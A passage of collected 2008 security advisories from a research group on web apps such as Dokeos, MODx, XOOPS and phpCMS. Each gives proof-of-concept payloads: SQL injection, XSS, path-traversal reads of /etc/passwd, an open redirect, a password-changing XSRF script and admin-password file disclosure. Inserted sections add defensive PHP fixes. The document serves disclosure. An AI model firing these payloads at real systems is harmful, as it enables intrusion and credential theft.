1.3 Linked XSS vulnerability found in slim.php. GET parameter jz_path.

Example:

http://[server]/[installdir]/slim.php?jz_path=<IMG SRC=javascript:alert('DSecRG XSS')>

1.4 Linked XSS vulnerabilities found in popup.php. GET parameters frontend, theme, jz_path.

Example:

http://[server]/[installdir]/popup.php?theme=<IMG SRC=javascript:alert('DSecRG XSS')>

1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/;<script>alert('DSecRG XSS')</script>

2. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews, POST parameter siteNewsData.

Example:

siteNewsData = </textarea><script>alert('DSecRG XSS')</script>

2.2 Vulnerability found in script popup.php?ptype=playlistedit, POST parameter query.

Example:

query = <script>alert('DSecRG XSS')</script>

--
Digital Security Research Group
[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-015

Application:             Dokeos E-Learning System
Versions Affected:       1.8.4
Vendor URL:              http://dokeos.com
Bugs:                    Multiple SQL Injections, Multiple Blind SQL Injections, Multiple XSS, etc.
Exploits:                YES
Reported:                25.01.2008
Vendor response:         28.01.2008
Patch released:          12.02.2008
Date of Public Advisory: 19.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The Dokeos E-Learning System has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Blind SQL Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS

Details
*******

1. Multiple SQL Injections

1.1 An attacker can inject SQL code in module /whoisonline.php, vulnerable parameter id. The attacker must have valid user credentials.

Example:

http://[server]/[installdir]/whoisonline.php?id=1'+and+dsec=dsecrg+union+select+user(),version()/*

1.2 An attacker can inject SQL code in module main/mySpace/index.php, vulnerable parameter tracking_list_coaches_column.

Example:

http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin&tracking_list_coaches_column=0';

1.3 An attacker can inject SQL code in module /dokeos/main/create_course/add_course.php, POST parameter tutor_name.

Example:

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&tutor_name='

2. Multiple Blind SQL Injections

2.1 Vulnerability found in script index.php in the header parameter Referer.

Example:

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '

2.2 Vulnerability found in script /main/admin/class_list.php in the header parameter X-Forwarded-For.

3. Stored XSS

Vulnerability found in /main/auth/inscription.php. An attacker can inject XSS in POST parameter username.

4. Multiple linked XSS

4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php. An attacker can inject XSS in parameter courseCode.

Example:

http://[server]/[installdir]/main/calendar/myagenda.php?courseCode=;<script>alert('DSecRG XSS')</script>

4.2 Linked XSS vulnerability found in main/admin/course_category.php. An attacker can inject XSS in parameter category.

Example:

http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=<script>alert('DSecRG XSS')</script> HTTP/1.0

4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php. An attacker can inject XSS in parameter cmessage.

Example:

http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=%22%27<img/src=javascript:alert('DSecRG XSS')>

5. Image XSS

Vulnerability in page main/auth/profile.php. An attacker can upload an avatar picture containing XSS code.

More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian)

Fix Information
***************

The vendor fixed this flaw on 12.02.2008. The patch for version 1.8.4 can be downloaded here:
http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
[DSECRG-08-011 | FIX INFORMATION] Astrosoft HelpDesk Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-011 | FIX INFORMATION

Application:             Astrosoft HelpDesk
Versions Affected:       1.95.228
Vendor URL:              http://astrosoft.ru/
Bugs:                    Multiple XSS Injections
Exploits:                YES
Reported:                29.01.2008
Date of Public Advisory: 04.02.2008
Vendor response:         05.02.2008
Updated Report:          14.02.2008
Solution:                HelpDesk was altered to fix this flaw on 13.02.2008. Updated version - 1.95.228
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-014] Multiple LFI in PowerNews (Newsscript) 2.5.6
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-014

Application:             PowerNews (Newsscript)
Versions Affected:       2.5.6
Vendor URL:              http://www.powerscripts.org/
Bug:                     Multiple Local File Include
Exploits:                YES
Reported:                01.02.2008
Vendor Response:         none
Solution:                none
Date of Public Advisory: 08.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

PowerNews (Newsscript) has multiple Local File Include vulnerabilities.

1. Local File Include vulnerabilities found in the scripts:

pnadmin/categories.inc.php
pnadmin/news.inc.php
pnadmin/other.inc.php
pnadmin/permissions.inc.php
pnadmin/templates.inc.php
pnadmin/users.inc.php

An unauthenticated user can access these scripts directly.

Code
####

if ($_GET[subpage]) {
    if (file_exists($_GET[page]."_".$_GET[subpage].".inc.php")) {
        include($_GET[page]."_".$_GET[subpage].".inc.php");
    } else {
        ?><center><?PHP echo L_ALL_SUBPAGENOTFOUND; ?></center><?PHP
    }
} else {

####

Example:

http://[server]/[installdir]/pnadmin/categories.inc.php?subpage=../../../../../../../../../../../../../etc/passwd%00

2. Local File Include vulnerability found in script pnadmin/index.php in the admin area. An administrator can include local files.

Code
####

if ($pnloggedin != "YES") {
    include("login.inc.php");
} else {
    if (!$_GET[page]) {
        $_GET[page] = "main";
    }
    if (file_exists($_GET[page].".inc.php")) {
        include($_GET[page].".inc.php");
    } else {

####

Example:

http://[server]/[installdir]/pnadmin/index.php?page=../../../../../../../../../../../../../etc/passwd%00

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-013] Modx 0.9.6.1, 0.9.6.1p1 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-013

Application:             MODx CMS
Versions Affected:       0.9.6.1, 0.9.6.1p1
Vendor URL:              http://modxcms.com/
Bugs:                    XSS, SiXSS, stored XSS, Change User Password XSRF Vulnerability
Exploits:                YES
Reported:                11.01.2008
Vendor response:         11.01.2008
Updated Report:          29.01.2008
Vendor response:         none
Solution:                none
Date of Public Advisory: 07.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The MODx system has multiple security vulnerabilities:

1. Linked XSS
2. Linked SiXSS
3. XSS in POST
4. Stored XSS in POST
5. Change User Password XSRF Vulnerability

Details
*******

1. Multiple linked XSS vulnerabilities found. An attacker can inject XSS into the URL string.

1.1 Linked XSS vulnerability found in manager/index.php, GET parameter search. The search string is available on the pages:

http://[server]/[installdir]/manager/index.php?a=75
http://[server]/[installdir]/manager/index.php?a=84
http://[server]/[installdir]/manager/index.php?a=99
http://[server]/[installdir]/manager/index.php?a=106
http://[server]/[installdir]/manager/index.php?a=114

Example:

http://[server]/[installdir]/manager/index.php?a=75&search=;<IMG SRC=javascript:alert('DSecRG XSS')>
http://[server]/[installdir]/manager/index.php?a=84&search=;<IMG SRC=javascript:alert('DSecRG XSS')>

1.2 Linked XSS vulnerability found in index.php, GET parameter highlight.

Example:

http://[server]/[installdir]/index.php?searched=modx&highlight=;<IMG SRC=javascript:alert('DSecRG XSS')>

2. Multiple linked SiXSS vulnerabilities found. An attacker can inject XSS code into the SQL error message.

2.1 Vulnerability found in script manager/index.php, GET parameter a.

Example:

http://[server]/[installdir]/manager/index.php?a='<img src=javascript:alert('DSecRG XSS')>

2.2 Vulnerability found in script index.php, GET parameter id.

Example:

http://[server]/[installdir]/index.php?id='<img src=javascript:alert('DSecRG XSS')>

3. XSS in POST. An attacker can inject XSS in a POST parameter.

3.1 Vulnerability found in script index-ajax.php, POST parameters docgrp and moreResultsPage.

Example:

moreResultsPage = <IMG SRC=javascript:alert('DSecRG XSS')>

3.2 Vulnerability found in script index.php, POST parameters email, name and parent.

Example:

name = style=background:url(javascript:alert('DSecRG XSS'))

4. Stored XSS in POST

Vulnerability found in script manager/index.php?a=10, POST parameters messagesubject and messagebody. An attacker can compose a message with script code in the subject and message body.

5. Change User Password XSRF Vulnerability

The previous password is not required to set a new password. Using the XSS vulnerabilities, an attacker can include the following code to change a user's password:

___
<IMG%20SRC=`javascript:var%20objHTTP%20=%20new%20ActiveXObject('MSXML2.XMLHTTP');%20objHTTP.open('POST',"http://[server]/[installdir]/manager/index.php?a=34",false);%20objHTTP.setRequestHeader('Content-Type',%20'application/x-www-form-urlencoded');%20objHTTP.send("pass1=123456%26pass2=123456");`>
___

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-012] Multiple LFI in Azucar CMS 1.3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-012

Application:             Azucar CMS
Versions Affected:       1.3
Vendor URL:              http://azucarcms.sourceforge.net/en_home.htm
Bug:                     Multiple Local File Include
Exploits:                YES
Reported:                30.01.2008
Vendor Response:         NONE
Date of Public Advisory: 05.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Azucar CMS has multiple Local File Include vulnerabilities.

1. Local File Include vulnerabilities found in scripts index.php and index_sitios.php

Code
####

if (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW]))
    include($_GET[_VIEW]);
else
    header("Location: html/sitio/");

####

Example:

http://[server]/[installdir]/index.php??view=src/sistema/vistas/../../../../../../../../../../../../../etc/passwd

2. Local File Include vulnerability found in script src/sistema/vistas/template/tpl_inicio.php

Code
####

$vista = (isset($_GET[_VIEW])) ? $_GET[_VIEW] : PATH_PROYECTO . 'vistas/index.php';
include($vista);

####

Example:

http://[server]/[installdir]/src/sistema/vistas/template/tpl_inicio.php?_VIEW=../../../../../../../../../../../../../etc/passwd

3. Local File Include vulnerability found in script html/sitio/index.php

Code
####

if (isset($_GET[_VIEW])) {
    if (!file_exists($_GET[_VIEW])) {
        $vista_array = explode('/', $_GET[_VIEW]);
        $vista = $vista_array[0] . '/es_ES/' . $vista_array[2];
    } else
        $vista = $_GET[_VIEW];
}
$vista = (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW])) ? $vista : PATH_PROYECTO . 'vistas/es_ES/index.php';
include($vista);

####

Example:

http://[server]/[installdir]/html/sitio/index.php?view=vistas/../../../../../../../../../../../../../etc/passwd

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-010] VHD Web Pack 2.0 Local File Include
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-010

Application:             VHD Web Pack 2.0
Versions Affected:       VHD Web Pack 2.0
Vendor URL:              http://www.divideconcept.net/index.php?page=vhdwebpack/index.php
Bugs:                    Local File Include
Exploits:                YES
Reported:                28.01.2008
Vendor response:         NONE
Date of Public Advisory: 04.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The VHD Web Pack 2.0 system has a Local File Include security vulnerability.

Details
*******

Local File Include

An attacker can inject PHP code and execute OS commands with the privileges of the web server user.

Vulnerable script:    /vhdwebpack/index.php
Vulnerable parameter: page

Example:

http://[server]/vhdwebpack/index.php?page=/../../../../../../../../boot.ini

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
[DSECRG-08-009] xoops 2.0.18 Local File Include
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-009

Application:             XOOPS
Versions Affected:       XOOPS 2.0.18
Vendor URL:              http://www.xoops.org/
Bugs:                    Local File Include, URL Redirecting phishing
Exploits:                YES
Reported:                28.01.2008
Vendor response:         28.01.2008
Date of Public Advisory: 04.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The XOOPS system has multiple security vulnerabilities:

1. Local File Include
2. URL Redirection Phishing

Details
*******

1. Local File Include

An attacker can inject PHP code and execute OS commands with the privileges of the web server user.

Vulnerable script:         htdocs/install/index.php
Vulnerable POST parameter: lang

Vulnerable code:

---
$language = 'english';
if ( !empty($_POST['lang']) ) {
    $language = $_POST['lang'];
. . . .
if ( file_exists("./language/".$language."/install.php") ) {
    include_once "./language/".$language."/install.php";
---

Example:

POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
Content-Length: 67
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php

lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next

2. URL Redirection Phishing

Vulnerability found in script htdocs/user.php in the POST parameter xoops_redirect.

Example:

http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com

Fix Information
***************

The vendor fixed this flaw in SVN on 28.10.2007.
http://xoops.svn.sourceforge.net/viewvc/xoops?view=rev&revision=1282
Tracker: http://sourceforge.net/tracker/index.php?func=detail&atid=430840&aid=1881236&group_id=41586

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
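The redirection issue above is an open redirect: the target parameter is passed to the browser unchecked. The following is an added example, not XOOPS code, of a helper that only ever redirects to a site-absolute path; the function name safe_redirect and the sample targets are constructed for the demonstration, and the advisory's http://evilsite.com payload is among them.

```php
<?php
// Added example (not XOOPS code): restrict a post-login redirect target such
// as xoops_redirect to a path on this site. Names are illustrative.

declare(strict_types=1);

/**
 * Return a safe local redirect target derived from $target, or $default
 * when $target is absent, malformed, or points off-site.
 */
function safe_redirect(?string $target, string $default = '/index.php'): string
{
    if ($target === null || $target === '') {
        return $default;
    }
    // CR/LF or other control characters would allow response-header injection.
    if (preg_match('/[\x00-\x1F\x7F]/', $target)) {
        return $default;
    }
    // Several browsers treat "\\evil.com" like "//evil.com"; normalise first.
    $candidate = str_replace('\\', '/', $target);
    $parts = parse_url($candidate);
    // Anything with a scheme, host or userinfo is an absolute or
    // protocol-relative URL and therefore leaves this site.
    if ($parts === false || isset($parts['scheme']) || isset($parts['host']) || isset($parts['user'])) {
        return $default;
    }
    $path = $parts['path'] ?? '';
    // Require a site-absolute path with exactly one leading slash.
    if ($path === '' || $path[0] !== '/' || (isset($path[1]) && $path[1] === '/')) {
        return $default;
    }
    // Rebuild from the validated pieces only.
    $safe = $path;
    if (isset($parts['query'])) {
        $safe .= '?' . $parts['query'];
    }
    if (isset($parts['fragment'])) {
        $safe .= '#' . $parts['fragment'];
    }
    return $safe;
}

// Constructed inputs: the advisory's payload, common bypass shapes, a header
// injection attempt, and one legitimate local target.
$samples = [
    'http://evilsite.com',
    '//evilsite.com/login',
    '/\\evilsite.com',
    'javascript:alert(1)',
    "/index.php\r\nSet-Cookie: x=1",
    '/modules/news/?storyid=5#c1',
];
foreach ($samples as $t) {
    printf("%-36s -> %s\n", addcslashes($t, "\r\n"), safe_redirect($t));
}

// In the real handler the call would be:
// header('Location: ' . safe_redirect($_GET['xoops_redirect'] ?? null));
```

The check is deliberately an allow rule (one leading slash, no scheme, no authority) rather than a deny list of known bad prefixes, since new bypass shapes keep appearing in browsers' URL parsing.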
[DSECRG-08-011] Astrosoft HelpDesk Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-011

Application:             Astrosoft HelpDesk
Versions Affected:
Vendor URL:              http://astrosoft.ru/
Bugs:                    Multiple XSS Injections
Exploits:                YES
Reported:                29.01.2008
Vendor response:         NONE
Date of Public Advisory: 04.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The Astrosoft HelpDesk system has multiple security vulnerabilities:

1. Linked XSS
2. Linked SiXSS

Details
*******

1. Linked XSS vulnerability found in operator/article/article_search_results.asp. An attacker can inject XSS in GET parameter txtSearch.

Example:

http://[server]/[installdir]/operator/article/article_search_results.asp?txtSearch=;</form><IMG SRC=javascript:alert('DSecRG XSS')>

2. SiXSS in URL

Vulnerability found in script operator/article/article_attachment.asp. An attacker can inject XSS code into the SQL error message via GET parameter Attach_Id.

Example:

http://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id=;<script>alert('DSecRG XSS')</script>

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
[DSECRG-08-008] Textpattern 4.0.5 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-008

Application:             Txp CMS
Versions Affected:       4.0.5
Vendor URL:              http://www.textpattern.com
Bugs:                    DOS, multiple XSS, etc.
Exploits:                YES
Reported:                11.01.2008
Vendor response:         14.01.2008
Patch Released:          03.02.2008
Date of Public Advisory: 04.02.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The Textpattern system has multiple security vulnerabilities:

1. Parameter Value Overflow
2. Linked XSS
3. XSS in POST
4. Stored XSS
5. Insecure password changing algorithm

Details
*******

1. Parameter Value Overflow

Vulnerability found in script index.php in the comments section, POST parameter message. The application does not limit the length of the parameter value. This can be used to perform a DoS attack.

Example:

message = [A]x1

2. Linked XSS

Vulnerability found in /textpattern/setup/index.php. An attacker can inject XSS into the URL string.

Example:

http://[server]/[installdir]/textpattern/setup/index.php/;<script>alert('DSecRG XSS')</script>

3. XSS in POST

Vulnerability found in script index.php in the comments section, POST parameter name.

Example:

name = <img src=javascript:alert('DSecRG XSS')>
name = <script>alert('DSecRG XSS')</script>

4. Stored XSS

Vulnerability found in script textpattern/index.php?event=article in POST parameter Body.

Example:

Body = <IMG SRC=javascript:alert(&quot;DSecRG_XSS&quot;)>

5. Insecure password changing algorithm

The previous password is not required to set a new password. If an attacker gains access to the admin session by using an XSS vulnerability, he can change the admin password without knowing the old one. It would be more secure to ask for the old password when changing the password or the primary email.

Fix Information
***************

Textpattern was altered to fix this flaw on 03.02.2008. The updated version (4.0.6) can be downloaded here:
http://textpattern.com/download

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
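Item 5 above and item 5 of the MODx advisory (DSECRG-08-013) describe the same weakness: a password can be set without proving the old one, so a forged request, or a script running in a stolen session, is enough. The following is an added example, not Textpattern or MODx code, of a password-change check that requires the current password and an anti-forgery token. The function names, the field names csrf_token and current_password, and the sample requests are constructed; pass1/pass2 are taken from the MODx payload. Note what each control buys: the token stops a request forged from another origin, while the current-password check is what still holds when the attacker already runs script inside the victim's session (same-origin XSS can read the token).

```php
<?php
// Added example (not Textpattern or MODx code): a password-change check that
// needs both the current password and a per-session anti-forgery token.
// Names are illustrative; the caller is assumed to have authenticated the
// session and loaded the user's stored password_hash() value.

declare(strict_types=1);

// One random token per session, stored server-side and embedded in the form.
function new_csrf_token(): string
{
    return bin2hex(random_bytes(32));
}

// Constant-time comparison so the token cannot be recovered byte by byte.
function csrf_token_valid(string $sessionToken, ?string $submitted): bool
{
    return $submitted !== null && hash_equals($sessionToken, $submitted);
}

/**
 * Validate a password-change request. Returns null when the change may
 * proceed, or a short reason when it must be refused.
 */
function check_password_change(array $post, string $sessionToken, string $storedHash): ?string
{
    // 1. Cross-site forgery: a request from another origin cannot carry the
    //    session's token, so the MODx-style blind POST of pass1/pass2 fails here.
    if (!csrf_token_valid($sessionToken, $post['csrf_token'] ?? null)) {
        return 'missing or invalid anti-forgery token';
    }
    // 2. Session theft or same-origin XSS: the attacker may hold a valid
    //    session (and token) but does not know the current password.
    $current = $post['current_password'] ?? '';
    if ($current === '' || !password_verify($current, $storedHash)) {
        return 'current password does not match';
    }
    // 3. Ordinary input validation on the new password.
    $new = $post['pass1'] ?? '';
    if ($new === '' || $new !== ($post['pass2'] ?? null)) {
        return 'new passwords are empty or do not match';
    }
    if (strlen($new) < 12) {
        return 'new password is too short';
    }
    return null;
}

// Demonstration with constructed data.
$token = new_csrf_token();
$hash  = password_hash('correct horse battery', PASSWORD_DEFAULT);

$cases = [
    // a. forged request carrying only pass1/pass2, as in the MODx advisory
    ['pass1' => '123456', 'pass2' => '123456'],
    // b. token present (obtainable via same-origin XSS) but no current password
    ['csrf_token' => $token, 'pass1' => 'a much longer new secret', 'pass2' => 'a much longer new secret'],
    // c. legitimate change by the account owner
    ['csrf_token' => $token, 'current_password' => 'correct horse battery',
     'pass1' => 'a much longer new secret', 'pass2' => 'a much longer new secret'],
];
foreach ($cases as $i => $post) {
    $result = check_password_change($post, $token, $hash);
    printf("case %s: %s\n", chr(ord('a') + $i), $result ?? 'accepted');
}
```

Changing the primary e-mail address deserves the same current-password check, as the advisory suggests, because it is the usual path to a password reset.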
[DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.
[#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory

Application:             OpenBSD BGPD daemon
Versions Affected:       OpenBSD 4.1
Vendor URL:              http://openbsd.org
Bugs:                    XSS
Exploits:                YES
Reported:                10.10.2007
Vendor response:         10.10.2007
Date of Public Advisory: 31.01.2008
Authors:                 Alexandr Polyakov, Anton Karpov
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The OpenBSD BGPD daemon web interface has an XSS vulnerability.

History
*******

http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html

Details
*******

Linked XSS vulnerability found in script /cgi-bin/bgplg. An attacker can inject XSS in parameter cmd.

Example:

http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>

Fix Information
***************

The vendor fixed this flaw in svn on 10.10.2007. The updated version, OpenBSD 4.2, which was released on Nov 1, 2007, can be downloaded here:
http://openbsd.org

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
Re: [DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.
Version 4.2 is NOT affected, please alter it in the advisory at http://secunia.com/advisories/28726/ and others.

Vendor fixed this flaw in cvs on 10.10.2007.
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/bgplg/bgplg.c
Updated version OpenBSD 4.2, which was released Nov 1, 2007, is NOT vulnerable.

[#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory

Application:             OpenBSD BGPD daemon
Versions Affected:       OpenBSD 4.1
Vendor URL:              http://openbsd.org
Bugs:                    XSS
Exploits:                YES
Reported:                10.10.2007
Vendor response:         10.10.2007
Date of Public Advisory: 31.01.2008
Authors:                 Alexandr Polyakov, Anton Karpov
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

OpenBSD BGPD daemon Web Interface has XSS vulnerability.

History
*******

http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html

Details
*******

Linked XSS vulnerability found in script /cgi-bin/bgplg; attacker can inject XSS in parameter cmd.

Example:

http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>

Fix Information
***************

Vendor fixed this flaw in cvs on 10.10.2007. Updated version OpenBSD 4.2, which was released Nov 1, 2007, can be downloaded here:
http://openbsd.org

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Best regards,
Digital Security Research Group
mailto:[EMAIL PROTECTED]
Remote File Disclosure in phpCMS 1.2.2
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-005

Application:             phpCMS
Versions Affected:       1.2.2
Vendor URL:              http://www.phpcms.de
Bug:                     Remote File Disclosure, Get admin password
Exploits:                YES
Reported:                10.01.2008
Vendor response:         12.01.2008
Date of Public Advisory: 29.01.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

The phpCMS system has a remote file disclosure vulnerability in page /parser/include/class.cache_phpcms.php.

Details
*******

An attacker can read any file in the web directory.

The file parser/parser.php includes class.cache_phpcms.php:

---
// Load the i18n Handler
if (isset ($_GET ['file']) && isset($DEFAULTS->I18N) && 'on' == $DEFAULTS->I18N) {
    include(PHPCMS_INCLUDEPATH.'/class.lib_i18n_phpcms.php');
    $I18N = new i18n;
}
$PHPCMS->check_secure_stealth();
include(PHPCMS_INCLUDEPATH.'/class.cache_phpcms.php');
exit;
---

In class.cache_phpcms.php, the function GetFile() parses the URL and returns the full file name or a default value. The function checks the file extension but does not check for null byte injection. To read a file, an attacker must append a valid extension after a null byte, e.g. %00.gif:

---
// filequery exists, but filename is empty? - set the defaultvalue for filename
if(!stristr($temp, $DEFAULTS->PAGE_EXTENSION) AND !stristr($temp, '.gif') AND !stristr($temp, '.png') AND !stristr($temp, '.jpg') AND !stristr($temp, '.js') AND !stristr($temp, '.css') AND !stristr($temp, '.htm') AND !stristr($temp, '.html')) {
    if(substr($temp, -1) != '/') {
        $temp = trim($temp).'/'.$DEFAULTS->PAGE_DEFAULTNAME;
        $temp.= $DEFAULTS->PAGE_EXTENSION;
    } else {
        $temp = trim($temp).$DEFAULTS->PAGE_DEFAULTNAME;
        $temp.= $DEFAULTS->PAGE_EXTENSION;
    }
}
---

In class.cache_phpcms.php, the function CheckFile() takes the file name and, if the file exists, reads it and prints its contents:

---
$PfadUndDatei = $this->GetFile();
$this->name = basename($PfadUndDatei);
$this->path = dirname($PfadUndDatei);
...
// there's no contentfile with this name - errorpage or errormessage
if(!file_exists($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name)) {
    $errorname = basename($DEFAULTS->ERROR_PAGE_404);
    $errorpath = dirname($DEFAULTS->ERROR_PAGE_404);
...
...
$fsize = filesize($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name);
$fd = fopen($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name, "rb");
$contents = fread($fd, $fsize);
$contents = trim($contents);
$fsize = strlen($contents);
fclose($fd);
...
echo $contents;
---

Example:

http://[server]/[installdir]/parser/parser.php?file=/parser/include/default.php%00.gif

default.php contains the admin password and other defaults:

---
class defaults {
    function defaults() {
        global $PHP, $PHPCMS;
        if(!defined("_DEFAULTS_")) {
            define("_DEFAULTS_", TRUE);
        }
        $this->PASS = 'YourPasswordHere';
...
---

On Windows any local file can be read:

http://[server]/[installdir]/parser/parser.php?file=\..\..\..\..\..\..\..\..\..\..\boot.ini%00.gif

http://www.phpcms.de/download/index.en.html

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Digital Security Research Group
mailto:[EMAIL PROTECTED]
Nucleus 3.31 XSS in path
Hello.

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-006

Application:             Nucleus CMS
Versions Affected:       3.31
Vendor URL:              http://nucleuscms.org
Bugs:                    XSS Injection in URL
Exploits:                YES
Reported:                16.01.2008
Vendor response:         18.01.2008
Date of Public Advisory: 29.01.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Linked XSS vulnerability found in action.php. An attacker can inject XSS into the URL string.

Example:

http://[server]/[installdir]/action.php/;<script>alert('DSecRG XSS')</script>

Fix Information
***************

TikiWiki was altered to fix this flaw on 29 January 2008. The updated version (3.32) can be downloaded here:
http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
mailto:[EMAIL PROTECTED]
[!!FIX Information ] Nucleus 3.31 XSS in path
This is an updated version of the advisory: the Fix Information part has been updated and a mistake in the vendor name corrected.

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-006

Application:             Nucleus CMS
Versions Affected:       3.31
Vendor URL:              http://nucleuscms.org
Bugs:                    XSS Injection in URL
Exploits:                YES
Reported:                16.01.2008
Vendor response:         18.01.2008
Date of Public Advisory: 29.01.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Linked XSS vulnerability found in action.php. An attacker can inject XSS into the URL string.

Example:

http://[server]/[installdir]/action.php/;<script>alert('DSecRG XSS')</script>

Fix Information
***************

Nucleus was altered to fix this flaw on 29 January 2008. The updated version (3.32) can be downloaded here:
http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
mailto:[EMAIL PROTECTED]
[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-003

Application:             Blogcms
